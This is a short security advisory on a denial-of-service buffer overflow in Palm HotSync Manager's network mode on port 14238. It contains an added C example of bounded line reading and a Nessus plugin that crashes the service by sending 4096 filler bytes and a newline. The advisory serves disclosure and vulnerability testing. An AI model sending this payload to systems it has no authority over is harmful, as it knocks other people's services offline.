COMMAND

    Hotsync

SYSTEMS AFFECTED

    Palm Pilot (HotSync Manager 3.0.4 under Windows 98)

PROBLEM

    Aviram Jenik found the following. A HotSync DoS attack is not as
    sexy as breaking into networks via printers, but it still deserves
    some attention. The Palm HotSync Manager is vulnerable to a buffer
    overflow that can crash the HotSync application and possibly be
    used to execute arbitrary code on the machine running HotSync.

    When the HotSync Manager is set to 'network' mode, it listens on
    port 14238. By sending a large amount of data to that port,
    followed by a newline, it is possible to crash the HotSync
    application.
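
    Added example (not part of the advisory, and not HotSync's own
    code, which the advisory does not show): one way a service that
    reads newline-terminated input from a socket can bound each line,
    so that input such as the 4096 bytes plus newline sent by the
    plugin below is rejected instead of being written past a fixed
    buffer. MAX_LINE, line_reader and its functions are hypothetical
    names, and the 256-byte limit is an assumed value.

```c
#include <stdio.h>
#include <string.h>

#define MAX_LINE 256  /* assumed per-line limit; not taken from the advisory */
enum line_status { LINE_OK, LINE_INCOMPLETE, LINE_TOO_LONG };

struct line_reader {          /* hypothetical helper, not HotSync code */
    char   buf[MAX_LINE + 1]; /* +1 for the terminating NUL */
    size_t len;               /* bytes stored for the current line */
    int    overflowed;        /* current line already exceeded MAX_LINE */
};

void line_reader_reset(struct line_reader *r) { r->len = 0; r->overflowed = 0; }

/* Feed bytes as they arrive from recv(). Consumes up to and including the
 * first '\n' and reports how many bytes were used. Bytes beyond MAX_LINE are
 * dropped instead of written past the buffer, and the line is reported as
 * LINE_TOO_LONG so the caller can close the connection. */
enum line_status line_reader_feed(struct line_reader *r, const char *data,
                                  size_t n, size_t *used)
{
    for (size_t i = 0; i < n; i++) {
        if (data[i] == '\n') {
            r->buf[r->len] = '\0';        /* len <= MAX_LINE: in bounds */
            *used = i + 1;
            return r->overflowed ? LINE_TOO_LONG : LINE_OK;
        }
        if (r->len < MAX_LINE)
            r->buf[r->len++] = data[i];
        else
            r->overflowed = 1;            /* drop the byte, mark line as bad */
    }
    *used = n;
    return LINE_INCOMPLETE;               /* no newline yet: wait for more data */
}

int main(void)
{
    static char big[4097];                /* constructed input: 4096 bytes + '\n' */
    struct line_reader r;
    size_t used;
    memset(big, 'X', 4096);
    big[4096] = '\n';
    line_reader_reset(&r);
    printf("oversized line -> %d\n", line_reader_feed(&r, big, sizeof big, &used));
    line_reader_reset(&r);
    printf("normal line    -> %d\n", line_reader_feed(&r, "sync\n", 5, &used));
    return 0;
}
```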

    Full advisory can be found at:

        http://www.securiteam.com/exploits/Palm_HotSync_Manager_is_vulnerable_to_Denial_of_Service_attack.html

    The following Nessus Plugin can be used to test this:

    #
    # This script was written by Noam Rathaus <noamr@securiteam.com>
    #
    # See the Nessus Scripts License for details
    #
    #
    if(description)
    {
      name["english"] = "HotSync Manager Denial of Service attack";
      script_name(english:name["english"]);

      desc["english"] = "It is possible to cause HotSync Manager to crash
    by sending a few bytes of garbage into its listening port TCP 14238.

    Solution: Block those ports from outside communication

    Risk factor : Low";

      script_description(english:desc["english"]);

      summary["english"] = "HotSync Manager Denial of Service attack";
      script_summary(english:summary["english"]);

      # ACT_DENIAL: this check can crash the tested service
      script_category(ACT_DENIAL);

      script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");
      family["english"] = "Windows";
      script_family(english:family["english"]);

      exit(0);
    }

    #
    # The script code starts here
    #

    if (get_port_state(14238))
    {
      sock14238 = open_sock_tcp(14238);
      if (sock14238)
      {
        # 4096 filler bytes terminated by a newline
        data_raw = crap(4096) + string("\n");
        send(socket:sock14238, data:data_raw);
        close(sock14238);

        # Give the service time to fail, then try to reconnect
        sleep(5);

        sock14238_sec = open_sock_tcp(14238);
        if (sock14238_sec)
        {
          # Port still accepts connections: the service survived
          security_warning(port:14238, data:"HotSync Manager port is open.");
          close(sock14238_sec);
        }
        else
        {
          # Port no longer answers: the service crashed
          security_hole(port:14238);
        }
      }
    }

SOLUTION

    HotSync Manager under Windows 2000. 3Com has been notified of
    this, and promised that the next release of the HotSync Manager
    will be fixed.